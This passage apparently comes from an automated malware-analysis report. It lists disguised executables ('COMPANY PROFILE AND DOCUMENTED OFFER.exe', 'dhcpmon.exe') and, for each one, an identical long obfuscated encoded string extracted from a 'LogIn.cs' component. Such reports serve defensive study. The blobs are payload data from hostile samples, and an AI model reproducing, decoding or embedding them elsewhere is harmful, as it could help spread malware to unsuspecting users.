DpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJRjfEPkRXZp0EPEsJRjxEPERVZopEOOLbBDNNPuZSRDHK2usJwF8NNNRGOuRRTuRTSuRTwzxbBNNNPtNEOtbeNNLdNNNGZNVNXNNNNNfNNORNN3WYNNOjXQbNNNbbBjNNPaZwNNNXPjpPomjNNNc0VtNNNDbeNNLdRmNRNRbNNNNZNNNENNWiZDNNPuuopm0NNNbYNz8kNNNXTAbZSt0eUjpPPEuiCtNNPu8DXQ8NNNbbDNNNPz9ONNNXWtxL1t0WPQUqO29PNNNXPvfNOvbNNOZjNDNUNNNNQDNNRDNHPvfNOvcTNNVJztVKztVLzvtENNNTNPbNNNNGZNZNVNNNNN4NNORNsttNNNE+PDNNOU4XNNNRXORNNNLNpwfNNUNXXjNTXuZjNtNFNNNNQjNNRDNPNluQNNNXXRDNNNbXXjNTXtNNRmNONNjNNNNDNNNENNVbEDNNPtbeNNLdRmNONONNNNNENNNENANWNNNPXPRNNNbXXjNTXuZjNDNZNNNNQtNNRDNPXRLNNNbXXjNTXuZjNtNqNNNNRtNNRDNPwNLNNOfH/tRYOljVXNRNNPfXXjHNNtbeNNLdWtNQ/uHTNNNoXvLNNvtzNNNXNPbNNNNGZNVNADNNNOZNNORNNagVNNNXo0xNNNbYO4jWNNNoSC4OQNtfSPtPNNNePjW7FNNNPtqiFtNNPtNNNNpXXjNTXyVNNvtzNNNXNNWmFjNNPa1VNNNXXv4bTNNNObNZNNNRXu4PXPLNNNbdNNOPH0cPNDNONNNNNNNZNNNNqwVhZP41ZQplAjNNNNNSNTjNNNPbPDNNV34NNODXNNOjPDNNV1A0pzyhM3ZNNNNNuOZNNTDNNNNwIIZN6OZNNONNNNNwE1IWENNNNCtGNNQ0ONNNV0Wfo2VNNNNNNNNNNtNNNIpIbtxWQjNNNCbOZjNJNNNONNNNBDNNNNfNNNNZNNNNVjNNNORNNNOYNNNNCjNNNOZNNNNTNNNNPtNNNNjNNNNWNNNNNDNNNNDNNNNONNNNNjNNNNZNNNNPNNNNNNNZODRNNNNNNNLNdtBJOjLNSjFJOjLNztYZOt8NQttNNNLN2jXzODLNwDBzODLN/tBzODLNltBzODLN4jBzODL
Source: sjZXfoyePbSa.exe.0.dr, LogIn.cs	Base64 encoded string: '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
Source: 0.0.COMPANY PROFILE AND DOCUMENTED OFFER.exe.a70000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.a70000.0.unpack, LogIn.cs	Base64 encoded string: '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
Source: dhcpmon.exe.7.dr, LogIn.cs	Base64 encoded string: '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
Source: 7.0.COMPANY PROFILE AND DOCUMENTED OFFER.exe.9a0000.0.unpack, LogIn.cs	Base64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNOvbNRmNONNfNNNNUNNNENPtANNNTPvfNOvc+pwfNNUPNPNNNOUV7NNOjtNxNNNElBjNNpVNXNNNRXxbNNvtzNNNXNNZROFtENNNTNPbNNOZjONO0NNNNPNNNRDOmWjNNPtbTVYvPNDNtXWbONT8bNNNXXPxNNNbNNvtINNNTOPtHNNNTPjpbRjNNOtZbSDNNOvtFNNNTQNtbXtNNPt0WolfNNNbqzuZRRDEiYNNNPuhnRjHEOKV9NNOjTOvAStNNNFtgNNNXWuLbYtNNPtNdRmNSNWpNNNNWNNNENPtiNNNXN28jNNNXPjVPwzxK2cRspTRZNb5cS9LK2usJwF8NNNRANb5cS9bGOORRRjHJRjLeBtxEOtVEOcRVLDpEO5SugWjEOjAiZDNNPusn/tRGPORVRjxEPFjTSuZUNPfVNORUS9LGOjNEOusJRjLEOuRSZpNWNb5cTAbK1usnS9nAYjNNNFtlNNNXqNHNNOfXXjNTXtNGZNHNctNNNNbNNORNStfPomZNNNbGOkVUXQDNNNbZPNwLTgtAPEsnS9nAYjNNNEZRPOsnRjtJRjxeDjtK2uZXSuZYXl0PRDxEP281NNNXRjjFQPt2NNNXXQpNNNbJRDDUTvt4NNNXNNpn1tfEPksJR